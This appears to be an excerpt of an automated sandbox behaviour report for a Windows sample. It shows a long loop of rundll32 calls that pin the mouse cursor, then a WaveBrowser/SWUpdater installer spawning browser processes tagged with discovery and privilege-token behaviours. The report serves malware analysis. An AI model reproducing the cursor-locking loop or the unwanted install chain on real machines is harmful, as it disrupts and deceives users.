C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:512
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8720
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9284
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4244
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:1704
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4048
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9280
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9412
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9404
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9420
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:2116
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8688
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8980
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9444
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9460
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:392
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8988
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8904
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3096
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4172
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:6020
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:2636
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9312
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8256
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3144
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:6084
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:6608
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5572
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8880
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8220
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9124
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:2092
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4840
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:6288
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4992
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9544
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9616
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4880
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9600
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3628
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9608
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5548
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3120
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4628
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9764
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9812
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5864
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5232
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9808
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9744
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9796
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9836
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9740
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9724
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10024
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10040
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10056
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9908
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9880
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10080
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9924
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10176
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10216
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9972
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10200
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8972
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10196
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4108
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4900
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5740
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4424
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3192
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9276
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3480
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4344
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:1832
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8784
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9604
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9416
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9392
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9720
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4796
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9452
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5420
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:6632
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5352
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:1600
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9084
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9488
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:2396
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:2636
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9312
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9492
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4516
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10020
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8256
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9380
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3624
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8304
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9164
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8388
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10152
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9020
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:2656
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9304
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9672
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8300
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9308
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:340
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4520
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9548
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9540
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4948
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4276
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9636
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9620
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:6564
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:8620
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3628
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9608
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5548
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:3120
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4628
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9732
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:6012
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9780
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9800
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9832
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9852
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9840
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9804
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10032
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9856
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9916
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10056
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9976
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:2264
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:10192
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:5740
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4424
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9692
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4336
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4244
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:1704
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:4048
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9280
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9412
-
-
C:\Windows\system32\rundll32.exerundll32 user32.dll,SetCursorPos 0,03⤵PID:9404
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4736
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2368
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3184
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4e8 0x4701⤵
- Suspicious use of AdjustPrivilegeToken
PID:5160
-
C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe"C:\Users\Admin\Wavesor Software\SWUpdater\SWUpdater.exe" -Embedding1⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
PID:1324 -
C:\Users\Admin\Wavesor Software\SWUpdater\Install\{080AB544-9325-476C-A151-8F1F9209A464}\WaveInstaller-v1.5.18.2.exe"C:\Users\Admin\Wavesor Software\SWUpdater\Install\{080AB544-9325-476C-A151-8F1F9209A464}\WaveInstaller-v1.5.18.2.exe" /installerdata="C:\Users\Admin\AppData\Local\Temp\guiA090.tmp"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4376 -
C:\Users\Admin\AppData\Local\Temp\nshA360.tmp\setup.exe"C:\Users\Admin\AppData\Local\Temp\nshA360.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\nshA360.tmp\wavebrowser.packed.7z" --wid=ei2i3n7w --installerdata="C:\Users\Admin\AppData\Local\Temp\guiA090.tmp"3⤵
- Executes dropped EXE
- Modifies registry class
PID:5376 -
C:\Users\Admin\AppData\Local\Temp\nshA360.tmp\setup.exeC:\Users\Admin\AppData\Local\Temp\nshA360.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Crashpad" --annotation=channel= --annotation=plat=Win64 --annotation=prod=WaveBrowser --annotation=ver=1.5.18.2 --initial-client-data=0x258,0x25c,0x260,0x234,0x264,0x7ff7a8f112d0,0x7ff7a8f112dc,0x7ff7a8f112e84⤵
- Executes dropped EXE
PID:2752
-
-
C:\Users\Admin\AppData\Local\Temp\nshA360.tmp\setup.exe"C:\Users\Admin\AppData\Local\Temp\nshA360.tmp\setup.exe" --verbose-logging --installerdata="C:\Users\Admin\AppData\Local\Temp\guiA090.tmp" --create-shortcuts=0 --install-level=04⤵
- Executes dropped EXE
PID:5772 -
C:\Users\Admin\AppData\Local\Temp\nshA360.tmp\setup.exeC:\Users\Admin\AppData\Local\Temp\nshA360.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Crashpad" --annotation=channel= --annotation=plat=Win64 --annotation=prod=WaveBrowser --annotation=ver=1.5.18.2 --initial-client-data=0x258,0x25c,0x260,0x234,0x264,0x7ff7a8f112d0,0x7ff7a8f112dc,0x7ff7a8f112e85⤵
- Executes dropped EXE
PID:3160
-
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --install-type=1 --from-installer4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks system information in the registry
- Drops file in Program Files directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
PID:5428 -
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\WaveBrowser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\WaveBrowser\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\WaveBrowser\User Data" --annotation=channel= --annotation=plat=Win64 --annotation=prod=WaveBrowser --annotation=ver=1.5.18.2 --initial-client-data=0x114,0x118,0x11c,0xe4,0x120,0x7ffa36fcccf0,0x7ffa36fcccfc,0x7ffa36fccd085⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5436
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=gpu-process --no-appcompat-clear --start-stack-profiler --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2056,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=2036 /prefetch:25⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1032
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --start-stack-profiler --field-trial-handle=1828,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=2096 /prefetch:35⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5464
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2316,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=2332 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5508
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3080,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3092 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:6264
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3100,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3640 /prefetch:25⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:6332
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3260,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4020 /prefetch:85⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:6352
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4560,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4552 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6992
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4104,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4608 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5076
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4512,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4808 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6448
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --start-stack-profiler --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4556,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4812 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:6476
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4388,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=3320 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:6488
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4628,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=4968 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:6528
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4656,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5084 /prefetch:15⤵
- Executes dropped EXE
PID:6536
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=4676,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5192 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
PID:6408
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4700,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5304 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
PID:2212
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4732,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5424 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:804
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=4740,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5540 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:6548
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=renderer --instant-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4764,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=5656 /prefetch:15⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
PID:5960
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6352,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6364 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6864
-
-
C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe"C:\Users\Admin\Wavesor Software\WaveBrowser\wavebrowser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6344,i,6239653226126841642,5726733826740032361,262144 --variations-seed-version=15 --mojo-platform-channel-handle=6508 /prefetch:85⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6884
-
-
